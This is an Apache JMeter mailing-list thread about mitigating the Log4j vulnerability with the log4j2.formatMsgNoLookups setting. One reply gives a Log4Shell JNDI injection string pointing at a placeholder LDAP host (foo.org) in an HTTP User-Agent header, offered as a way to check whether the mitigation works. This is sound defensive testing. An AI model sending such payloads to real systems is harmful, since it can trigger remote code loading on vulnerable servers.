I mean, the setting works. Try (without setting) to build a plan that has
header: User-Agent: $ {jndi: ldap: //foo.org/attack} in the http header
manager in http sampler and execute the script. The script hangs and after
a few dozen seconds you will see ConnectException to the foo.org server in
the console logs. The risk of someone attacking you in JMeter in this way
is small (you must follow an unknown plan).
Mariusz
On Wed, 15 Dec 2021 at 18:43, Yevgeniy Grimaylo
<[email protected]> wrote:
> Hello,
>
> Would you please clarify, how adding the next line to *system.properties*
> file (lives in "bin" folder of your JMeter installation), mitigate security
> risk with log4j2 ?
>
>
>
> Thanks,
>
> Yevgeniy Grimaylo
>
>
>
> *From: *Mariusz W <[email protected]>
> *Reply-To: *JMeter Users List <[email protected]>
> *Date: *Wednesday, December 15, 2021 at 4:09 AM
> *To: *JMeter Users List <[email protected]>
> *Subject: *Re: Jmeter Log4J
>
>
>
> I tested it and it works:)
>
> *-Dlog4j2.formatMsgNoLookups=true*
>
>
>
> Regards,
>
> Mariusz
>
>
>
> On Tue, 14 Dec 2021 at 16:45, Dmitri T <[email protected]> wrote:
>
> It should be sufficient to add the next line to *system.properties* file
> (lives in "bin" folder of your JMeter installation)
>
> *log4j2.formatMsgNoLookups=true*
>
> or pass this property via -D command-line argument like:
>
> *jmeter -Dlog4j2.formatMsgNoLookups=true -n -t .....*
>
> More information:
>
> - Constants.java from log4j 2.13.3
>
> <https://urldefense.com/v3/__https:/github.com/apache/logging-log4j2/blob/log4j-2.13.3/log4j-core/src/main/java/org/apache/logging/log4j/core/util/Constants.java*L63__;Iw!!A4F2R9G_pg!Mv2_eh9t63s3rXK_r7PgpdiuSD9ZV3AOd5CP0g2hgyursYjcOCQrvIL-W77C8f29VI3_Cm6v8A$>
> - Configuring JMeter
>
> <https://urldefense.com/v3/__https:/jmeter.apache.org/usermanual/get-started.html*configuring_jmeter__;Iw!!A4F2R9G_pg!Mv2_eh9t63s3rXK_r7PgpdiuSD9ZV3AOd5CP0g2hgyursYjcOCQrvIL-W77C8f29VI2hUuyepA$>
> - Apache JMeter Properties Customization Guide
>
> <https://urldefense.com/v3/__https:/www.blazemeter.com/blog/apache-jmeter-properties-customization__;!!A4F2R9G_pg!Mv2_eh9t63s3rXK_r7PgpdiuSD9ZV3AOd5CP0g2hgyursYjcOCQrvIL-W77C8f29VI12lFankQ$>
> - Overriding Properties Via The Command Line
>
> <https://urldefense.com/v3/__https:/jmeter.apache.org/usermanual/get-started.html*override__;Iw!!A4F2R9G_pg!Mv2_eh9t63s3rXK_r7PgpdiuSD9ZV3AOd5CP0g2hgyursYjcOCQrvIL-W77C8f29VI1ZvHFyQw$>
>
>
>
> On 12/14/2021 12:40 PM, Smruti Ranjan Roul wrote:
>
> Hi Team,
>
>
>
> With the recent vulnerabilities identified on Apache Log4j on 10th
> December, I wanted to know if there will be a new version of the Apache
> JMeter planned with the latest log4j versions.
>
>
>
> With the organization security policy, there will be a scan on the log4j.
> We know this will not have any impact with the vulnerability identified,
> but to provide the InfoSec team, with a confirmation email from the
> provider will be a added confidence.
>
>
>
> Thanks in advance.
>
>
>
> Thanks, and Regards,
> Smruti Ranjan Roul
> Technical Lead- *QA*
>
>
> First American (India) Private Limited
> “Aveda Meta”, No.184, Old Madras Road,
> Opp. Swami Vivekanand Metro Station,
> Indiranagar, Bangalore-560038, Karnataka, India
>
> Mobile : + 91 8880138672
> Email : [email protected]
>
>
>
>
>
>
>
>
>
>
> ******************************************************************************************
> This message may contain confidential or proprietary information intended
> only for the use of the addressee(s) named above or may contain information
> that is legally privileged.
> If you are not the intended addressee, or the person responsible for
> delivering it to the intended addressee, you are hereby notified that
> reading, disseminating, distributing or copying this message is strictly
> prohibited.
> If you have received this message by mistake, please immediately notify us
> by replying to the message and delete the original message and any copies
> immediately thereafter.
>
> If you received this email as a commercial message and would like to opt
> out of future commercial messages, please let us know and we will remove
> you from our distribution list.
>
> Thank you.
>
> ******************************************************************************************
> FAFLD
>
>
